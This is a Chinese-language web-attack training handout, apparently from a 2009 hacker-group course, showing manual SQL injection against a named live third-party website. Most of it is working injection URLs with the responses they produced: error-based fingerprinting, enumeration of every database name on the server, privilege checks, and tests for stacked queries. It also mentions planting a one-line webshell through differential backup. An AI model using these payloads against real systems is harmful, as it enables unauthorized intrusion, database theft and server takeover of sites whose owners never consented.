绿色兵团-2009培训活动-WEB攻防培训资料.docVIP

作者：应要求不透露名字 化名：外星人（兵团高级成员） 大家好，我是负责本次web攻防课程的讲师！这次我们通过几个实例贯穿全课程，希望可以得到较好的效果。 好的 下面我们看一下http://www.mtufc.tv/newsdetail.asp?id=342 这个注入点。 http://www.mtufc.tv/newsdetail.asp?id=342’ url后面加’ 我们看爆出的信息。 Microsoft OLE DB Provider for ODBC Drivers error 80040e14 [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string . /newsdetail.asp, line 9 我们从而得知了他的数据库是mssql http://www.mtufc.tv/newsdetail.asp?id=342 and 1=(select @@version)— 查询到 数据库版本是Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) http://www.mtufc.tv/newsdetail.asp?id=342 and 1=user_name(); 当前数据库连接用户为newuser http://www.mtufc.tv/newsdetail.asp?id=342 and 1=db_name();-- 当前数据库名为dbmtutd 这里我们延伸一下：小插曲，~.0~！！让我们把所有的数据库都爆出来如何？也许是个不错的主意，因为mssql是可以跨库查询的，这意味着什么？ 嘿嘿！ and 1=(select name from master.dbo.sysdatabases where dbid=7)-- //暴库 dbid=6 递增或递减数字来爆出所有库名 http://www.mtufc.tv/newsdetail.asp?id=342 and 1=(select name from master.dbo.sysdatabases where dbid=1)— http://www.mtufc.tv/newsdetail.asp?id=342 and 1=(select name from master.dbo.sysdatabases where dbid=2)-- ……. 最后我们得到了所有数据库。。。。 master, tempdb, model, msdb, pubs, Northwind, sitebuilder18116D05DA2EAB740940AA01C8CCF0CA, classified, thai_g_dnn, ULTECH2, chili, dbmtutd, thl_bronze, 《SQL Server手注暴库表列数据》 里列出了详细的跨库利用方法，在此不在讲解了，大家课下看一下！ 好吧插曲结束，我们继续课程 Mssql数据库有着很多用户组，他们代表着不同的权限。那么我们来检测newuser用户的权限吧。 http://www.mtufc.tv/newsdetail.asp?id=342 and 1=(select IS_SRVROLEMEMBER(sysadmin));-- 返回页面不正常，很遗憾不是sa权限。 http://www.mtufc.tv/newsdetail.asp?id=342 and 1=(select IS_MEMBER(db_owner));-- 这条语句返回是正常的，好吧是db_owner权限，DB可以做很多事情，比如列出服务器目录，以及在差异备份一句话到WEB目录，或者任何有权限的目录，运气好的话直接备份进启动项拿到终端权限。 接下来我们来查询数据库是否支持多行执行，上面说到DB权限可以差异备份一句话到web目录，可是必须在数据库支持多行执行的情况下才行，那么就让我们看看吧。 http://www.mtufc.tv/newsdetail.asp?id=342;declare @a int— 返回正常说明支持多行执行，返回错误则反之。显而易见这个站支持多行执行。先不要高兴的太早，我们往下看。 为了让大家学到有趣的东西，我们依然不走捷径，为了表示上次太过于自信而没有做任何备课，此次我在课前做了大量的测试，那么让我们继续我们的课程。 and (select count(*) from *)=0 好吧让我们用这条语句来猜测网站的管理表